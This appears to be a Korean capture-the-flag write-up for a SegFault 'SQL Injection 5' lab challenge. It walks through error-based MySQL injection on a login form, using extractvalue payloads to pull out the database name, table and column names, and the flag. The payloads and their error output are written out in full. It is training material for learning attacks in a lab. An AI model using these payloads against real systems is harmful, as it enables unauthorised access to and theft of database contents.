[SegFault] (SQLi) - SQL Injection 5

[SegFault] (SQLi)

SQL Injection 5

Flag 찾으세요! 인내심을 가지세요! ㅋㅋㅋㅋ

문제 파악

위의 페이지에 들어가면 아래와 같은 창이 나온다.

우선 주어진 계정 정보로 로그인 해보자.

계정 정보 : normaltic / 1234

 

로그인 하면  다음과 같은 페이지로 넘어간다.

로그인 후에 봤을때 딱히 입력 부분이 보이지 않는다.

그렇다면 로그인 창에서 SQL Injection이 가능한지 확인해보자.

 

SQL Injection Point

'and'1'='1 을 넣어준 상태로도 정상 동작하는지 확인한다.

normaltic'and'1'='1 / 1234

위의 id / pw로도 로그인되는지 확인한 결과 정상적으로 로그인되는 것을 확인했다.

그렇지만 여기서 로그인에 대한 결과 외에 SQL Injection 방식을 결정할 방법이 있는지 확인해야 한다.

그래서 ' 를 입력하여 ' 의 개수가 맞지 않도록 유도하여 syntax error를 발생시켜본다.

그 결과 에러 메시지가 로그인창 하단부에 그대로 노출되는 것을 확인할 수 있었다.

이를 기반으로 Error Based SQL Injection의 진행 절차(Process)에 따라 진행한다.

---

풀이 과정 (해결 방안)

1. SQL Injection Point 찾기

위에서 Error 정보가 화면에 노출되는 것을 확인하였다.

 

2. Error를 유발하는 함수

본 문제의 경우 MySQL을 사용한다. MySQL의 에러 유발 함수는 extractvalue 이다.

 

3. 공격 Format 작성하기

' and extractvalue('1',concat(0x3a,(______))) and '1'='1

이제 위의 빈칸에 원하는 SQL 구문을 삽입하면 된다.

 

4. DB 이름 확인하기

어떤 TABLE과 COLUMN이 있는지 알아내기 위해 어떤 DB가 존재하는지 부터 확인한다.

' and extractvalue('1',concat(0x3a,(select database()))) and '1'='1

Could not update data: XPATH syntax error: ':sqli_2_2'

그 결과 DB 이름은 sqli_2_2 임을 확인할 수 있었다.

 

5. Table 이름 확인하기

Table을 확인하기 위한 쿼리는 다음과 같다.

select table_name from information_schema.tables where table_schema = 'sqli_2_2'

위의 쿼리를 공격 Format에 담아 입력해본다.

' and extractvalue('1',concat(0x3a,(select table_name from information_schema.tables where table_schema = 'sqli_2_2'))) and '1'='1

그 결과 다음과 같은 오류가 발생하였다.

Could not update data: Subquery returns more than 1 row

에러의 내용을 보면 여러행이 나오기 때문에 발생한 에러로 확인되었다.

limit을 이용하여 한줄씩만 출력해줄 필요가 있어 보인다.

그전에 TABLE의 개수를 확인해 보도록하자.

' and extractvalue('1',concat(0x3a,(select count(table_name) from information_schema.tables where table_schema = 'sqli_2_2'))) and '1'='1

그 결과는 다음과 같다.

2개의 Table이 존재하는 것을 확인하였다. 그럼 각각의 이름을 limit (0~1)을 통해 확인해보자.

select table_name from information_schema.tables where table_schema = 'sqli_2_2' limit 0,1

이를 공격 Format에 담에 입력해주면 다음과 같은 결과가 나온다.

flagTable_this 와 member이라는 TABLE이 확인되었다.

 

6. Column 이름 확인하기

우선 이름이 의심스러운 flagTable_this 부터 확인해보기로 한다.

일단 해당 TABLE 내부에 몇 개의 COLUMN이 있는지 확인해본다.

' and extractvalue('1',concat(0x3a,(select count(column_name) from information_schema.columns where table_name = 'flagTable_this'))) and '1'='1

 

그 결과 2개의 flagTable_this TABLE은 COLUMN으로 이루어진 것을 확인할 수 있었다.

limit (0~1)을 이용하여 COLUMN 이름들을 확인해보자.

select column_name from information_schema.columns where table_name = 'flagTable_this' limit 0,1

위의 쿼리를 공격 Format에 담아 입력해준다.

' and extractvalue('1',concat(0x3a,(select column_name from information_schema.columns where table_name = 'flagTable_this' limit 0,1))) and '1'='1

그 결과는 다음과 같다.

2개의 COLUMN은 각각 idx 와 flag 였다.

 

7. Data 출력하기

우선 flag COLUMN부터 확인해보도록 한다.

먼저 flag COLUMN 내부의 DATA의 개수를 확인해보자.

' and extractvalue('1',concat(0x3a,(select count(flag) from flagTable_this))) and '1'='1

 

그 결과는 무려 17개나 되었다. (인내심을 가지라는 이유를 알겠다.)

limit (0 ~ 16)을 순서대로 확인해보자.

16개의 더미 데이터와 함께 13/16 번째에서 flag를 확인할 수 있었다.

결과적으로 Error Based SQLi를 통해 flag를 획득하는데 성공하였다.

---

질문 환영, 수정 및 보완에 대한 지적 환영